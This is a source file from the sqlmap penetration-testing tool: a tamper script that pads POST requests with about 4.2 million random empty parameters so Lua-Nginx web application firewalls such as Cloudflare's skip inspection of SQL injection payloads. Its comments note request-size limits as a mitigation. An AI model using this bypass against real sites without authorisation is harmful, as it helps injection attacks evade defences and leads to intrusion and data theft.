GitHub Repository: sqlmapproject/sqlmap
Path: blob/master/tamper/luanginxmore.py
#!/usr/bin/env python
"""
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
import random
import string
import os
from lib.core.compat import xrange
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import HINT
from lib.core.enums import PRIORITY
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
# Ordering key for the tamper pipeline; HIGHEST presumably makes this script run
# before lower-priority tampers -- confirm against the loader in lib/core.
__priority__ = PRIORITY.HIGHEST
def dependencies():
    """Emit a one-time warning that this tamper is only meaningful for POST requests.

    The script name shown in the warning is derived from this file's basename,
    truncated at the first dot.
    """
    script_name = os.path.basename(__file__).split(".")[0]
    message = "tamper script '%s' is only meant to be run on POST requests" % script_name
    singleTimeWarnMessage(message)
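def tamper(payload, **kwargs):
    """
    LUA-Nginx WAFs Bypass (e.g. Cloudflare) with 4.2 million parameters

    Reference:
        * https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/

    Notes:
        * Lua-Nginx WAFs do not support processing of huge number of parameters
        * The generated prefix is several MiB of request body, so request-size
          limits and body-size logging at the edge are a natural mitigation and
          detection point for this technique

    Args:
        payload: the injection payload; returned unchanged.
        **kwargs: "hints" (dict, mutated in place: HINT.PREPEND is set) and
            "delimiter" (str, defaults to DEFAULT_GET_POST_DELIMITER).

    Returns:
        ``payload`` unmodified. The only effect of this function is the
        HINT.PREPEND entry written into the caller-supplied ``hints`` mapping;
        if the caller passes no ``hints``, the generated string is discarded.
    """

    hints = kwargs.get("hints", {})
    delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER)

    # Hoisted out of the generator: the previous version rebuilt this
    # 62-character alphabet on every one of the ~4.2 million iterations.
    alphabet = string.ascii_letters + string.digits

    # 4194304 == 2**22 parameters, the count referred to in the docstring.
    parameter_count = 4194304

    # Each entry is a two-character random name (two distinct characters,
    # since random.sample draws without replacement) with an empty value,
    # e.g. "ab=". With a one-character delimiter that is ~4 bytes per
    # parameter, i.e. roughly 16 MiB built in memory before it is sent.
    hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(alphabet, 2)) for _ in xrange(parameter_count))

    return payload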